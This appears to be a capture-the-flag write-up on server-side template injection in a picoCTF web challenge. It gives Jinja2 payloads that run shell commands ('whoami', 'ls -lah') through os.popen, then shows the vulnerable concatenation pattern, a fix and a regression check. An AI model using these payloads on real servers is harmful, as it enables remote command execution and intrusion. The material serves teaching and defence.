Description
I made a cool website where you can announce whatever you want! Try it out! I heard templating is a cool and modular way to build web apps!
If we type picoCTF, it would show this:
Let’s try some template injection. In this case we are going to use {{7*7}}:
PayloadsAllTheThings/Server Side Template Injection
This time, we got 49, because 7 × 7 = 49. That means our injection works. Now, let’s try some more advanced injections.
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('whoami').read() }}
{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('ls -lah').read() }}
Now we can read the flag.
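Why {{7*7}} came back as 49, and the fix, as an added example that is not the challenge's source code: it assumes the site renders with Jinja2 (the `_TemplateReference__context` payload above is Jinja2-specific), and the markup and function names are hypothetical.

```python
# Added example: root cause and fix for the behaviour seen above.
# Assumption: Jinja2 is the template engine; markup and names are hypothetical.
from jinja2 import Environment

env = Environment(autoescape=True)

# Fixed template: the only template source the application ever compiles.
PAGE = "<h1>{{ announcement }}</h1>"


def render_vulnerable(user_text: str) -> str:
    """User text is concatenated into the template *source*.

    Jinja2 compiles whatever sits between {{ }} as an expression, so the
    visitor decides what code the server evaluates.
    """
    return env.from_string("<h1>" + user_text + "</h1>").render()


def render_fixed(user_text: str) -> str:
    """User text is passed as a *value* to a fixed template.

    It is never compiled, so {{ }} stays literal, and autoescape
    neutralises any HTML in it as well.
    """
    return env.from_string(PAGE).render(announcement=user_text)


def is_template_injectable(render) -> bool:
    """Regression check for CI: True if the arithmetic probe was evaluated."""
    out = render("{{7*7}}")
    return "49" in out and "7*7" not in out


if __name__ == "__main__":
    for fn in (render_vulnerable, render_fixed):
        print(fn.__name__, "->", fn("{{7*7}}"),
              "| injectable:", is_template_injectable(fn))
```

Running `is_template_injectable` against every handler that echoes user input keeps this class of bug from coming back after a refactor.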